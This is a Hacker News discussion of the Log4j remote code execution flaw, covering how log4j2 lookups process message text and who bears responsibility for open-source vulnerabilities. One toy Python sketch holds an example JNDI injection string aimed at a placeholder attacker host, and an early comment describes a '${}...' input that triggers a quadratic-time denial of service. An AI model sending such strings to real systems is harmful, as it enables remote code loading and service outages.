Log4j: Between a rock and a hard place (crawshaw.io)
553 points by todsacerdoti on Dec 11, 2021 | hide | past | favorite | 393 comments



Ironically, on a previous team I had switched our log4j2 log formats over to %m{nolookups} about 8 months ago... I didn't know about the whole JNDI issue; what we ran into was the O(n^2) behavior of its string substitution.

While deploying an ancillary change, our JVMs started locking up for minutes on end. What was happening was that we were logging customer input, and the change caused certain things to run in parallel, which ended up logging the data multiple times. Normally the extra logging didn't matter, but one customer had data like "${foo} ${bar} ${baz} ...". Even when the ${foo} portion is replaced without modification, this triggers quadratic behavior. So we were already potentially vulnerable to the DoS, but it was rare enough that we never got locked up until we logged the string multiple times, which then overflowed log4j's internal buffer and blocked worker threads.

You can try this yourself by just logging a string like "${}${}${}..." and in fairly short order it starts taking forever. I'm very glad the fix in 2.15 is to disable lookups by default.
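You can see why this goes quadratic with a toy model: if the substitution engine restarts its scan from the beginning of the string after every replacement, n adjacent tokens cost O(n^2) scanning work. This is a minimal Python sketch of that rescanning behavior, not log4j's actual code:

```python
# Toy model of recursive "${...}" substitution; NOT log4j's actual code.
# After each successful replacement the scanner restarts from the beginning
# of the string, so n adjacent tokens cost O(n^2) scanning work overall.
def substitute(text: str, lookups: dict) -> str:
    result = text
    start = result.find("${")
    while start != -1:
        end = result.find("}", start)
        if end == -1:
            break
        key = result[start + 2:end]
        replacement = lookups.get(key)
        if replacement is None:
            # Unknown keys are skipped (left in place) so we can't loop forever.
            start = result.find("${", end)
            continue
        result = result[:start] + replacement + result[end + 1:]
        start = result.find("${")  # rescan from the very beginning
    return result

print(substitute("${a} ${b}", {"a": "1", "b": "2"}))  # prints "1 2"
```

Each replacement forces a rescan of everything already processed, which is where the quadratic blow-up comes from; log4j's substitutor is recursive as well, as its own documentation notes.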

I hope that in the time after I left, the security org at the big tech company I worked at and reported this to (as what I thought it was: a DoS vector, not the complete pwnage it actually was) forced teams to switch to nolookups. Otherwise a lot of people had a bad week forcing updates through...


> So we were already potentially vulnerable to the DOS [...]

> the security org at the big tech company I worked at and reported this to

I'm confused about these two statements, because I did not find any recent CVEs for log4j in the DoS category, nor related to format lookup (other than CVE-2021-44228 of course).

Perhaps I misread it, but are you basically saying that (after you reported the issue to them internally) the security team at your previous company could not successfully report a DoS vulnerability in the default configuration of a widely used (by them, at least) Apache library and make sure a CVE got assigned to track it?

If so, it would be interesting to know where the CVE/vuln-reporting chain broke, possibly to reduce the blast radius for similar future cases.

Hypothetically speaking, a CVE in March for a DoS in a problematic design/feature could have resulted in flipping the default setting earlier. Instead of chasing live RCE in the wild in December.


No, they're saying they discovered that the interpolation behavior of their log4j was so slow that it had the potential of causing a DoS at their company.


There seems to be a misunderstanding here. We have on the one side a garbage feature that should never have been implemented - but if you want to keep it for backwards compatibility, sure. But then we have log4j scanning all values instead of only format strings - I think it can be argued that this behavior is a critical bug and was never intended to begin with. It seems to have only come about because whoever implemented the JNDI stuff lost their bearing in the absurd class hierarchies and abstractions in log4j.

Of course the last part holds the solution for our backwards compatibility issue. Remove the JNDI nonsense from the default package and move it into an extension package. Whoever wants to keep it can just add that to their dependencies and continue to enjoy logging functions that sometimes also make network connections and block your program.


Indeed - as evidence for this, I would submit that slf4j and logback were created to offer a drop-in replacement for log4j (slf4j literally provides alternative implementations of the org.apache.log4j.Logger class), but I have never seen anybody complain that "I switched to logback and slf4j and my jndi substitutions stopped working."

Nobody thought this was how log4j worked; log4j's documentation for format syntax only covers {} placeholders - the same format that slf4j has grandfathered in from log4j.

I agree this feels like a case where they got confused about their internal terminology. Log4j refers to messages with {} placeholders as 'FormattedMessages'; it refers to the log pattern syntax as 'Patterns' in code - but it seems to refer to them as 'log formats' in documentation.

Somewhere in this mess, someone hooked up the pattern capabilities into the formatting system.


> but I have never seen anybody complain that "I switched to logback and slf4j and my jndi substitutions stopped working."

SLF4J was created to replace Apache Commons Logging and Logback was created to replace Log4j 1.x. Both were created by Ceki Gülcü, the original author of Log4j 1.x [1].

Logback came out in 2006. The first beta version of Log4j 2.x was only released 6 years later in 2012, and the JNDI lookup feature was added in 2.0-beta9[2] in 2013!

Obviously nobody complained when switching from Log4j 1.x to SLF4J+Logback that a feature from a completely different library (with the same name) that would be created 7 years into the future was not supported.

> Somewhere in this mess, someone hooked up the pattern capabilities into the formatting system.

That's not what happened. The lookup mechanism (which includes "${jndi:}" lookups) is completely unrelated to the message formatting subsystem.

The way formatting and pattern lookups work in log4j2 is:

1. logger.info("Hello {}", "world") creates a FormattedMessage instance with the "Hello {}" format string and a single parameter, "world".

2. The FormattedMessage is wrapped in a LogEvent and routed to the correct appender(s).

3. Most appenders will format the LogEvent with a Layout. In our case, it's PatternLayout we care about[3].

4. PatternLayout will pre-calculate a set of PatternConverters based on your pattern, so it doesn't have to keep parsing the pattern on every invocation. "%m" will map to MessagePatternConverter.

5. (grossly simplifying zero-garbage and streaming optimizations) Each pattern converter is executed and appends to the final layout text's StringBuilder.

6. (grossly simplifying oh so many things) MessagePatternConverter will first call event.getMessage().getFormattedMessage(). The logic for formatting the message is entirely encapsulated by Message and its subclasses. MessagePatternConverter has no way to distinguish the format string from the user-provided parameters!

7. MessagePatternConverter finally applies the pattern lookups to the formatted message text. The pattern lookup mechanism is completely separate from and orthogonal to the message formatting mechanism.
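The seven steps above can be condensed into a toy Python model (the names loosely mirror the real classes, but this is not log4j code). The key point is that the lookups in step 7 run on the already-flattened string from step 6, so they cannot tell format text from user-provided parameters:

```python
# Toy model of the pipeline above; names loosely mirror the real classes,
# but this is NOT log4j code.

class FormattedMessage:
    """Step 1: pairs a '{}' format string with its parameters."""
    def __init__(self, fmt, *params):
        self.fmt, self.params = fmt, params

    def get_formatted_message(self):
        # Step 6: collapses format + parameters into one opaque string.
        out = self.fmt
        for p in self.params:
            out = out.replace("{}", str(p), 1)
        return out

def apply_lookups(text, lookups):
    """Step 7: pattern lookups run on the already-formatted text."""
    while "${" in text:
        start = text.index("${")
        end = text.index("}", start)
        text = text[:start] + lookups.get(text[start + 2:end], "") + text[end + 1:]
    return text

# By the time step 7 runs, format text and user data are indistinguishable:
flat = FormattedMessage("Hello {}", "${name}").get_formatted_message()
print(flat)                                    # prints "Hello ${name}"
print(apply_lookups(flat, {"name": "pwned"}))  # lookups fire on user data too
```

Because `apply_lookups` only ever sees the flattened string, a "${...}" token is processed identically whether the developer wrote it or an attacker supplied it as a parameter.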

---

That was long-winded, but I had to fight this annoying misconception about "log4j not implementing format strings properly".

Now, there are several things I'm not saying here:

1. I don't think more than a handful of people ever relied on lookups working on the log message (formatted or otherwise), as opposed to the pattern in the configuration file.

2. I don't think Log4j should have kept compatibility here. The moment the maintainers implemented "%m{nolookups}" (in version 2.7), they should have made it the default. That being said, I know this is very hard to do in the Java ecosystem. But I think it is time for the Java developer community to change its extremist position on compatibility at all costs.

3. I don't think that Log4j should have implemented pattern lookups for text messages to begin with. Even if it was just the format string part (which is impossible to do with Log4j's current architecture anyway).

4. I don't think any kind of string formatting should be included in a logging library. If you want to format log messages, use an external formatting function or string interpolation (if you're lucky enough to be using Kotlin or Scala). If it is added, it should only be used as a convenience, and shouldn't do anything more than formatting (like lookups). Relying on developers to always remember that log.info("Hello {}", world) is safe and log.info("Hello {}" + world) gives the entire internet full control of your server is beyond stupid. Even if Log4j went with this silly distinction, I would say it was a horrible design.
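For illustration, the hypothetical "lookups only on the literal format string" design would look roughly like this toy Python sketch (every name here is made up; this is not log4j's API). Lookups run before parameters are merged in, so parameterized arguments stay inert while concatenation still exposes the token:

```python
# Toy sketch of the hypothetical "lookups only on the format string" design
# discussed above; all names are made up and this is NOT log4j's API.

def resolve_lookups(fmt, lookups):
    # Runs only on the developer-written format string.
    while "${" in fmt:
        start = fmt.index("${")
        end = fmt.index("}", start)
        fmt = fmt[:start] + lookups.get(fmt[start + 2:end], "") + fmt[end + 1:]
    return fmt

def log_info(fmt, *params, lookups=None):
    fmt = resolve_lookups(fmt, lookups or {})  # before parameters merge in
    for p in params:
        fmt = fmt.replace("{}", str(p), 1)     # parameters stay inert text
    return fmt

user_input = "${jndi:ldap://attacker/a}"
print(log_info("Hello {}", user_input))  # token survives as harmless text
print(log_info("Hello " + user_input))   # concatenated: token gets resolved
```

Even this design is fragile, which is the commenter's point: one absent-minded `+` and user input lands in the format string anyway.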

[1] https://techblog.bozho.net/the-logging-mess/

[2] https://logging.apache.org/log4j/2.x/changes-report.html#a2....

[3] It seems like PatternLayout is the only layout vulnerable to this bug in log4j2, but it is hard to tell, the implementation being a classic Java mess of deep class hierarchies, liberal use of reflection to control everything, and some heroic attempts to break SOLID principles at least 4 times on a single line of code. Take my analysis with a grain of salt; it's a gross simplification of what is unfortunately par for the course in many Java libraries.


Thanks for bravely diving deeper into the class hierarchy than I did.

Your analysis of what should have been done in 2.7 is spot on.

Regarding my point about migration compatibility - I would not assume that the only time anyone moved from log4j to slf4j was when slf4j first came out. SLF4J+Logback is also a drop-in replacement for log4j 2, up to a point.


Thank you for your kind words!

> Regarding my point about migration compatibility - I would not assume that the only time anyone moved from log4j to slf4j was when slf4j first came out. SLF4J+Logback is also a drop-in replacement for log4j 2, up to a point.

In a way, you're right. By themselves, SLF4J+Logback are not a drop-in replacement for Log4j 2.x (or Log4j 1.x for that matter), but Log4j 2.x does provide an adapter that sends all calls to the log4j-api interfaces to whatever is implementing SLF4J (e.g. Logback). It also provides an API that does the reverse (implementing SLF4J through whatever is implementing the log4j-api). On top of that, there are also adapters which convert the Log4j 1.x API, the JUL API and Apache Commons Logging (yet another facade, like SLF4J or log4j-api 2.x) to SLF4J or log4j.

Accounting for all the permutations, there are probably thousands of slightly different migration paths you could take. This makes the situation a lot more complex than it seems at first glance.

I think you're imagining a project which started with Log4J 2.x and moved to SLF4J+Logback. You're right that such projects may exist, but to be more accurate:

1. By the time Log4J 2.x was started, SLF4J was already established as the standard facade for Java logging libraries. Log4J provided an SLF4J binding from the get-go, and I think many (if not most) projects which ended up using Log4J are using it through the SLF4J binding.

2. By the time Log4J 2.x started getting popular (around 2014-15?), Logback development had slowed down. It wasn't abandoned per se; there were still one or two minor releases a year until 2018, so it didn't die out, but progress was slow. At the same time, Log4J 2.x was adding new features quickly and making some impressive performance gains in multithreaded workloads[1]. So while there were some reasons to move from Logback to Log4j 2.x, there were no strong reasons to do the reverse.

In short, I don't think many people ever migrated between them.

There is a better argument you can make of course: Log4j 2.x just removed support for message lookups completely and no one complained. It shows that they could have just done it years ago with little worry. But we need to work harder to change the "compatibility über alles" mindset that prevails in Java and other ecosystems. It's perfectly OK to break compatibility for 0.001% of your users when you've got a serious security issue. Punishing 99.999% of the other users with an RCE because 0.001% MIGHT rely on some hack is not good engineering!

[1] https://logging.apache.org/log4j/2.x/manual/async.html


> But then we have log4j scanning all values instead of only format strings - I think it can be argued that this behavior is a critical bug and was never intended to begin with.

It was actually intended behavior, and this is what really boggles the mind! Javadoc says explicitly that variable replacement is recursive, with cycle detection (which will throw! What happens to the log line in this case?) [0].

[0] https://logging.apache.org/log4j/2.x/log4j-core/apidocs/org/...


That link is about variable replacement in config strings, which is intentionally recursive. It doesn't mention the use of the variable replacement mechanism when interpolating values into log messages, which is what makes this vulnerability so bad, and as far as I can see was not intentional.


Right, I was also confused by the blame on backward compatibility. You can keep things backward compatible without necessarily turning the feature on by default. There is no reason why `formatMsgNoLookups` shouldn't have been the default. If it is indeed an obscure and hacky feature kept for backward compatibility, just make it opt-in. People who really care about it will enable it; most people won't have to carry that baggage, and we wouldn't be in a situation like this.


>for a feature we all dislike yet needed to keep due to backward compatibility concerns.

If they really dislike the feature that much, they likely dislike the code and want to completely delete it. I'm not sure if making it opt-in would make them as happy as fully deleting it, so they are less motivated to make it opt-in than they would be to fully delete it.


They could also "fully" delete it by putting it in a separate opt-in package.


Hindsight is always 20-20.


"lost their bearing in the absurd class hierarchies and abstractions" sounds familiar. Java app stack traces are like Neal Stephenson epics, but less entertaining.


And enabled by default. That's the most mind-blowing bit of this feature. The backcompat argument is a deflection for shipping a time bomb into people's codebases.


To be fair to the maintainers, they didn't ship anything into people's codebases. People chose Log4j and pulled it into their code. FOSS contributors aren't responsible for downstream use of their projects.


I don't think this argument makes much sense beyond the purely legalistic.

If you add a backdoor to a widely used library, then yes, you shipped it there. You don't have legal liability for the consequences when it is found, but that does not make you not the one who shipped it.

It just protects you legally, as it should.


> I don't think this argument makes much sense, beyond completely legalistic.

The downstream users chose to use Log4j, chose to upgrade to the version where the exploit was introduced, chose not to audit the code. It's their responsibility and theirs alone.

A maintainer can release a new version of their software. No-one is under any obligation to use it. They certainly don't reach down into your repos and push their changes.

So I agree that the maintainers shipped a release. I certainly don't agree that they shipped it into anyone else's codebase.


> The downstream users chose to use Log4j, chose to upgrade to the version where the exploit was introduced, chose not to audit the code. It's their responsibility and theirs alone.

No. It is a manipulative framing where responsibility for a backdoor is pushed onto users.

It is especially ridiculous in the context of an industry where not upgrading is seen as irresponsible. And especially ridiculous when the same industry pushes for open source and then, when companies eventually start to listen and use open source, acts like there was something wrong with using open source.


> No. It is manipulative framing where responsibility for backdoor is pushed onto users.

I fundamentally disagree that anything was pushed onto downstream users. They explicitly pulled Log4j.

Framing it as the maintainers pushing the update onto downstream users is itself so manipulative that I wonder if you are conversing in good faith. Framing the bug as a backdoor is absurdly manipulative.

The Apache License even warns the users explicitly:

> Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License.


You are the part of the problem then.


Dude, take a step back here. You're using someone else's free code. Someone wrote some code for free, put it online, and said "yeah anyone can use this for free go ahead". They don't owe anyone anything.


Lack of legal liability for any kind of security exploit, and auditing processes for companies that allow wild west integration of libraries are the problem.


>It is especially ridiculous in the context of industry where not upgrading is seen as irresponsible.

Upgrading without due diligence and without reason is as irresponsible as not upgrading when the need to becomes manifest.

Running "unsafe" versions of software in conditions where their unsafe nature is not open to exploitation is a completely legitimate action. If you upgrade just because there's a later version available, you're rolling the dice as needlessly as the fellow who'll get around to it once he has time to read the code.

Note: I'm aware of, and also cherish, the no-warranties-explicit-or-implied clause. However, in real life, where social relationships do matter, I don't see this escape clause standing the test of time as society catches up with the technology.


Totally agreed. If software is ever to become a serious and respected industry we can't just deny responsibility and blame the users as soon as something goes wrong.


You can already do like in real industries, pay someone to write you a logging framework and they will be responsible for it. Guess what, you can even pay someone to just be responsible and audit FOSS code for you. Looks like we are already a serious and respected industry that just contains a few complaining entitled users benefiting from the free work of others...


Why don’t all those people affected by this ask for their money back?


They wrote code essentially willing to run exec on any string passed to it, enabled this feature by default, and then didn't loudly warn people that any string passed to log4j must be trusted. None of this is competent work.


Surely then the responsibility lies with the people who decided to use this apparently incompetent work in their infrastructure?

If I release terrible software with a license that expressly has no warranty and someone uses it, surely that's on them?


You must audit every single line of code for every piece of software you use.


Maintainers have responsibility over their code, not how it is integrated. Here the problem is entirely in their code, it is not depending on the downstream project or any way it is used there.


Maintainers have no responsibility at all, unless they're paid or bound by contracts in some other way.

Some feel responsible regardless, but they certainly don't have to. They can even introduce vulnerabilities intentionally, and it's your responsibility if you trusted them not to.


> They can even introduce vulnerabilities intentionally, and it's your responsibility if you trusted them not to.

Is that true? I can add code in my open source library to steal credit card numbers, and if you use it that'd be your fault?


There is a reason why some companies have internal repos only policy, and libraries only get added to them after legal and IT review.


It's not true. There's a legal system, and they cannot intentionally do illegal things or commit fraud.

But it's good not to trust random strangers on GitHub: maybe a user profile is just a facade for a criminal gang, maybe untraceable so they can get away with it.


Not every intentional vulnerability is meant for illegal things or fraud.


No, you can't escape legal responsibility from intentional sabotage that easily.


Intentional sabotage of my own project?

It doesn't take much imagination to come up with situations where one may intentionally introduce vulnerabilities in use-cases they don't care about in order to make handling of use-cases they do care about easier. Are you sure I can't "escape legal responsibility" for doing that in my own software that I share to others "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT? (emphasis not mine ;))


Irresponsibility != malice.

If your FOSS software uses plaintext passwords because you don't care about data-at-rest security for whatever reason, sure, you're not required to make all your public code super secure.

Otherwise all student projects uploaded to GitHub would be crimes.

If your FOSS software adds a bit of code that POSTs all inputted credit card numbers to https://seba_dos1.com, well, that's gonna look very different in court.

It's like holding a garage sale where you give stuff away for free. Nobody can complain if your old stereo that you gave away for free doesn't work, but if you have an old propane burner that's likely to sear somebody's face off, best to just throw it away.


Sounds as if you believe you could edit & change open source code to try to intentionally crash a car or an airplane, or just not care about that happening, and get away with it, just because "AS IS".


If the usage terms say "do not use in any critical applications", I would've thought that the responsibility for using the code in that fashion would be squarely with the entity that did the integration?

It'd probably be better if the usage terms would by necessity spell out that you were happy for the code to be used in life-critical situations, instead of having to opt out of it.


The default usage terms are "all rights reserved, nobody can use this but me". You change this by applying licenses which regulate the terms under which you're happy for the code to be used by others. The vast majority of popular Free Software licenses allow you to use the code under no guarantees whatsoever, so if you want to use some software in critical applications and hold its authors responsible if it doesn't work as advertised, you should probably pay them and include this responsibility in their contract.


Tell that to the people that removed their 'leftpad' repository.

Or the ones that are taking over FOSS projects to inject 'telemetry' spyware.


If you publish something, you have responsibility over it.


What kind of responsibility? In what sense? Could you give me an example?

By the way, this is a part of my license (a pretty common one):

  THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
  WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
  MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
  ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
  WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
  ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
  OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.


No, I don't. You may want to read the licenses of the code you're using, by the way.


Imagine the liability of publishing any code if you are "responsible" for it. Meaning that you would be responsible for its improper use, or even use for illegal purpose.


You are though. Forget the legalese for a second.

You wrote the code and put it out there.

If you didn't, none of the uses of it would ever have come to fruition.

A court of law may let you duck out for the time being, but when you trace the chain of effective physical causality backwards, at the end of the day: you wrote it, you're responsible for making its applications possible.

There is value to the code unwritten. That value is a clean conscience and a true absence of guilt or remorse for having enabled someone to do something monstrous.

I laugh at people who think a legal disclaimer absolves one of moral culpability. If only it were that easy.


I wonder how do the makers of kitchen knives sleep at night.


Exactly what part of:

THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

Suggests that maintainers have any responsibility over their code?


There's a legal system too; that license text isn't the whole world.

However in this case, to me it seems they obviously have nothing to worry about. (Since this bug was unintentional)


It's not obvious that putting in this legalese covers you if you otherwise promote it as working software and invite people to use it, and details would depend on jurisdiction.


Has Apache 2.0 ever been pierced in court anywhere?


It’s the equivalent of shipping a car with faulty brakes. It’s really debatable who is responsible.


> for a feature we all dislike yet needed to keep due to backward compatibility concerns.

It's logging. While logging is extremely important, I think we could all tolerate removing a vulnerable feature. Or, just move the feature to a separate package.

I have made bad decisions, we have all made bad decisions. Own them, improve, and celebrate the opportunity to learn and improve. Keeping this around, as a default, was a bad decision. If your enterprise contracts don't want to turn a flag on, then they can always skip upgrading (they generally do regardless).


They didn’t know it was vulnerable, they just didn’t like it for other reasons.

Should maintainers of all core apache libs just remove or disable features they don’t like, when not known to be insecure?

That said, log4j2 isn’t that old. Not sure why this was added in the first place. At the very least it’s a performance issue.


> Should maintainers of all core apache libs just remove or disable features they don’t like, when not known to be insecure?

I'd bet more will start doing so. If nobody is excited to keep the feature up and any unloved code contains risks, getting rid of it seems fine to me. If companies want that code maintained, they can pay up or get one of their people to do it.


> Should maintainers of all core apache libs just remove or disable features they don’t like, when not known to be insecure?

If noone funds their development and they maintain it for free? Then yes, why not.


If you are not being paid for it, why build features you don't like? That is what you do in your day job! Your hobby project should at least make you happy.


> Should maintainers of all core apache libs just remove or disable features they don’t like,

Why not? It can just go into a separate package.


I can imagine the maintainers being scared of silently breaking workflows and monitoring for some users. If you change this feature to opt-in, you may silently break the alerting system users built on top of it, and then you get the heat for breaking somebody's IT system (a hospital, maybe), just because you hated that feature. That it had an RCE would not have been known at the time.

In a perfect world, the feature would have been an option from the start, but in that same perfect world, the downstream users would be diligent and check release notes before upgrading. You might, but many of your colleagues don’t, they just upgrade, and complain when their system breaks.


That's why you have versioning: removing the feature would be a breaking change and indicated as such.


One place I worked used syslog to ship important analytics data from services to Kafka. log4j is a reasonable choice for logging to syslog from Java (but let's be honest, you should be on Logback). Now, using jndi as part of this? That's getting a little too clever.


> Keeping this around, as a default, was a bad decision.

Definitely. But really, they were screwed once it had shipped. They could and should have disabled it in an update long ago, but then anyone who read the release notes or the code would know how to exploit the millions of un-updated systems.


Recent and related:

Log4j RCE Found - https://news.ycombinator.com/item?id=29504755 - Dec 2021 (457 comments)

Widespread exploitation of critical remote code execution in Apache Log4j - https://news.ycombinator.com/item?id=29520415 - Dec 2021 (80 comments)


People, and many companies, seem to forget that such software comes "AS IS", and it means AS IS. I would be glad to see Fortune 500 companies try to put together a team providing flawless logging capabilities. In reality, I know they would not manage to be half as good as an open source library: first of all drowning developers in unnecessary administrative tasks, imposing stupidly unreasonable deadlines, and fully ignoring engineering advice from... well, the engineering team. It's an insult that those companies profiting massively from so many open source projects still have the audacity to put blame on (again) software whose premise is "AS IS", especially when, if you look at their projects (even the ones they sell to their customers), they are basically bullshit put together with spit and boogers (and I've worked in more than one FAANG, so I know this is true from experience).


Yes, log4j is garbage "as is" and should be avoided.


console.log("my message")

Job done.

Logging libraries are unnecessarily complicated.


Cool, now make it so that only high-severity logs from a particular set of subroutines get sent to a particular subset of employees, grouped into a daily email.

And make it possible to change any of those knobs at runtime, without touching the code (minimum severity, set of subroutines, set of recipients, delivery method).
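This kind of severity-and-subsystem routing is exactly what handler/filter configuration in a logging framework provides. Here is a minimal sketch using Python's stdlib logging (chosen for brevity; the log4j2 equivalent would be Appender and Filter entries in its config file):

```python
import logging

# Route only high-severity records from one subsystem to a dedicated handler.
# Each knob (level, subsystem filter, handler/destination) can be changed at
# runtime without touching the code that emits the logs.
root = logging.getLogger()
root.setLevel(logging.DEBUG)

alerts = logging.StreamHandler()
alerts.setLevel(logging.ERROR)                # knob 1: minimum severity
alerts.addFilter(logging.Filter("payments"))  # knob 2: only this subtree
root.addHandler(alerts)

logging.getLogger("payments.api").error("charge failed")  # reaches `alerts`
logging.getLogger("web").error("404")                     # filtered out
```

For the delivery knobs, the stdlib's logging.handlers.SMTPHandler and BufferingHandler cover emailing and batching; swapping them in is a config change, not a code change.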


There is an argument to be made that all those actions should be done by an external log parsing tool.

As with many things there is no easy right or wrong. For example, I want to be able to set log-level on different classes dynamically but where to draw the line?


> There is an argument to be made that all those actions should be done by an external log parsing tool.

Yes, keeping them separate is typically good, especially if you have multiple applications. There are also some instances where doing so leads to duplicate configurations that need to be kept in sync, and so you might want to have that logic bundled in the application itself.

In my workplace we have two options for sending Slack alerts: one from our NewRelic cloud account alerts, one built in to the logging framework. We use each for different purposes.

> As with many things there is no easy right or wrong. For example, I want to be able to set log-level on different classes dynamically but where to draw the line?

Exactly. My point wasn't that everybody needs a Swiss Army Knife structured logging framework, it was that OP's glib dismissal that 'console.log(), job done, why are you making this so complicated?' was naïve and obtuse.


Log parsing service filters and alerts (data dog, newrelic, splunk etc..)


Now add a date/time stamp. And thread name, current class/method, request trace ID, severity level, etc., to every log line in your app. Or just grab your favorite logging lib from Maven Central and call it a day.
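Those fields are typically one layout/format string away in any logging library; a minimal sketch with Python's stdlib logging (log4j2's PatternLayout plays the same role in Java):

```python
import logging

# One format string adds timestamp, thread, severity, and logger name to
# every line; no hand-rolled prefixes at each call site.
logging.basicConfig(
    format="%(asctime)s [%(threadName)s] %(levelname)s %(name)s - %(message)s",
    level=logging.INFO,
)
logging.getLogger("app.service").info("started")
# e.g. 2021-12-11 10:15:00,123 [MainThread] INFO app.service - started
```

Fields like the current function (`%(funcName)s`) or a request trace ID (via a custom Filter that stamps each record) slot into the same format string.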


I'm still flabbergasted that the original maintainers are rushing around trying to patch these problems. Unless their specific personal/professional projects are at risk they have no responsibility to hurry and fix a thing.

You'd think, in the spirit of open source, these multi-billion dollar companies--like Apple and Google and Amazon--would recognize the danger and immediately divert the best engineers they had to help this team identify and mitigate the problems. They should have been buried in useful pull requests.

For that matter, they should have really picked them all up in private jets and flown them to neutral working space with those engineers for a one or two week hackathon/code sprint to clean up the outstanding issues and set the project on a sustainable path. To get those maintainers there they should offer a six figure consulting fee and negotiate with their current employers to secure their temporary help.

I can't believe these folks just get abandoned like this while CEOs/CTOs from rich companies wring their hands wailing about the problems and not offering solutions.


> I'm still flabbergasted that the original maintainers are rushing around trying to patch these problems. Unless their specific personal/professional projects are at risk they have no responsibility to hurry and fix a thing.

Sorry, but what's the hard part to understand? Open source maintainers end up in this position because they are nice, helpful people who like using computers to solve problems for others. People who spend years on a project and then see a bigger problem arise don't suddenly turn that off. With the bigger problem, they'll want to work harder, not just hoist a middle finger and go binge Netflix without a care in the world.

But I totally agree with you on the CTOs, etc. I don't expect random programmers who like working on logging to also be good at solving complicated sociotechnological problems around paying for global infrastructure. But it boggles my mind that none of these richly rewarded, supposedly brilliant experts at organizing engineers has gotten out in front of this. If not out of community spirit or social responsibility, then out of pure self interest.


> none of these richly rewarded, supposedly brilliant experts at organizing engineers has gotten out in front of this

Indeed. Each of them has had to spend the last few days madly trying to fix this problem to avoid exposing their infrastructure. Each has been, in some way, reinventing the wheel to do so. I'm curious how many will actually submit their findings back to the original OSS project so others can learn from their experience?

There are always resources to put out a fire but rarely enough to install a sprinkler system.


For sure. And this was a richly predictable fire. Not this specific problem, of course. But there have been enough fires like this in the past that it makes no sense for companies to act like it won't happen again and again.


> they'll want to work harder, not just hoist a middle finger.

There is a perfectly healthy, acceptable, middle ground between those two extremes, however.


Oh? One that's comfortable and easily available to the kind of person who has spent years on an open-source project? One that won't increase the crap they're getting from project users and random strangers? Do tell.


Yes. It's quite simple. There's absolutely no need for maintainers to "rush" to do anything; just do it on a comfortable timeline. And no, this is not equivalent to giving people the finger. Only dishonest people would say so.


Ah, the magic "just". I don't think you've really grasped the kind of people who spend years maintaining open-source projects. This is like asking sysadmins to ignore alarms and downtime. The kinds of people who can be comfortable ignoring downtime rarely become sysadmins and don't last if they do.

Feel free to prove me wrong by pointing to the major open-source project you've led for years and how good you have been at ignoring problems with it.


No, the magic word is "healthy". I said "healthy, acceptable, middle ground". This means learning to say "no" or at least "later, when I have the time".

I have maintained open-source projects myself for about 15 years, and it is completely different from sysadmin alarms. I can do it on my time, and even with vulnerabilities I do it on the time I have previously allotted for doing it, since my family and my job come first. And no, I won't dox myself. There, I "just" said "no" to you. That's a healthy way of establishing boundaries.

By the way, feel free to prove that I'm wrong in saying that by pointing to any law that says I have to do otherwise.

And no, just because people have unhealthy behaviours doesn't make it a rule or a law.


Oh? Which projects? I'm skeptical that they are of the scale and importance we're talking about here. And as somebody who has done open-source stuff and also done sysadmin work, I say that there are commonalities, so you can't just handwave it away.

I agree that unhealthy behaviors don't make it a rule. But deep-set behaviors don't change overnight. And it's not clear to me that people who are perfectly healthy would ever put themselves in the situation of maintaining important infrastructure for free. As mentioned elsewhere, I've closed down an open-source project of mine because it grew too big and became more of a drain than a pleasure. But if everybody did that, we'd have a lot fewer open-source projects. So I think your breezy "just" only works for the kind of people who would never have ended up with this problem in the first place.


The answer is not to close open source projects, but establish healthy boundaries between your audience and yourself. And no, you don't have to be healthy to establish those boundaries, but you do need these boundaries if you want to be healthy.

Rather than giving up and closing a project, my answer to abuse and unreasonable demands is to be liberal with ignoring and blocking. It's not my fault that someone chose to berate me, but it's my choice whether to keep giving them a way to do it. But most of the time, a simple "I will do it when I have time" is more than enough. I believe in carefully curating the online places I manage in order to maintain a healthy atmosphere. I choose health and well-being above "popularity at all costs".

About the projects, I'm not gonna dox myself, and I don't think the cross-examination is warranted or even in the spirit of this site. I believe my post stands by itself. You can doubt all you want, but that only solidifies my belief I'm doing the right thing.


I'm not saying you aren't doing the right thing. Good for you. Stay healthy.

I am saying you are delusional to talk as if what's easy for you is what's easy for others. And that you're failing to consider that people who are in XKCD's "random person in Nebraska" bucket [1] are much less likely to have good habits and healthy boundaries in the first place, because people like that end up bailing much earlier.

[1] https://xkcd.com/2347/


Bullshit. I utterly and completely disagree that the boundaries I mention are hard to implement. I will also say that boundaries and limits are not only healthy, they are absolutely necessary for long-term, large-scale, open source projects, and this is why those projects survive. People in FOSS rarely get to be long-term maintainers without establishing clear boundaries, so most active long-term maintainers obviously do have the boundaries I mention. This is a lot of people. I'm clearly not talking about hobby projects; I'm talking about packages with thousands to millions of weekly downloads, for example.

